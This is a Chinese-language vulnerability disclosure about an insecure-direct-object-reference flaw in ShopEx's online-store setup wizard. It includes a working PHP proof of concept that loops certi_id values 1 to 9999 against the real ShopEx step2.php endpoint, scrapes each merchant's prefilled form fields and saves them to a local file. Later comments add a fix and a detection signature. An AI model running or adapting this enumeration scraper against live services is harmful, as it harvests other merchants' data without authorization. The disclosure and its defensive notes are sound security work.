|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php
// Proof-of-concept reproduced from the disclosure above.
//
// Weakness illustrated: the wizard's `refer` query parameter is client-built
// base64 JSON, and the server acts on the `certi_id` it contains without
// tying that id to the caller. Because the ids are small sequential integers,
// a loop over them is enough to pull up other merchants' wizard pages — an
// insecure-direct-object-reference pattern.
//
// NOTE(review): the effective server-side fix is to stop deriving the record
// from a client-supplied integer (bind the wizard to the authenticated session
// or an unguessable token) and to rate-limit step2.php. Detection signature for
// operators: one client requesting step2.php with many consecutive certi_id
// values in a short window.

for ($i=1; $i < 10000; $i++) { // enumerate candidate certi_id values 1..9999

ShowshopExD($i);

}

/**
 * Fetch the ShopEx wizard page for one certi_id and dump the prefilled form
 * fields it exposes.
 *
 * Behaviour, as written:
 *  - builds the JSON `refer` payload with intval($cid) and a fixed callback_url,
 *    base64-encodes it and appends it to the step2.php URL;
 *  - performs a cURL GET and converts the body to GB2312 (presumably for
 *    display on a GB2312 console — not verifiable from here);
 *  - treats the response as "id accepted" when the encoded refer string is
 *    echoed back in the body;
 *  - on acceptance, scrapes every <input type="text" .../> tag, extracts its
 *    name/value pair, echoes `name:value` and appends the same line to
 *    c:/shopEx.txt.
 *
 * @param int|string $cid candidate certi_id; coerced with intval() before use
 * @return void
 *
 * Known defects left as-is (this is a documentation pass):
 *  - strpos() returns 0 for a match at offset 0, which the bare truthiness test
 *    treats as "not found";
 *  - curl_exec() may return false and fopen() may fail; neither is checked;
 *  - $res[1][0] / $res[3][0] are read without confirming the inner regex matched.
 */
function ShowshopExD($cid) {

$url='http://guide.ecos.shopex.cn/step2.php';

// refer = base64( {"certi_id":<int>,"callback_url":"http:\/\/www.a.com\/"} )
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');

$url = $url.'?refer='.$refer;

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;

// CURLOPT_BINARYTRANSFER is a no-op in modern PHP; kept for fidelity.
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
$result = curl_exec($ch);

$result = mb_convert_encoding($result, "gb2312", "UTF-8");

// The server echoes the accepted refer back into the page; its presence is
// used as the "this certi_id exists" oracle.
if(strpos($result,$refer))

{

$fp = fopen("c:/shopEx.txt",'ab'); // append results to file
// Capture the attribute text of every single-line text input on the page.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);

foreach ($value[1] as $key) {
// Pull name="..." and value="..." out of the attribute text.
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);

echo $res[1][0].':'.$res[3][0]."\r\n";

$col =$res[1][0].':'.$res[3][0]."\r\n"; 

fwrite($fp, $col, strlen($col));

}

echo '--------------------------------'."\r\n";
fclose($fp); 
}

flush();

curl_close($ch);

}
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
|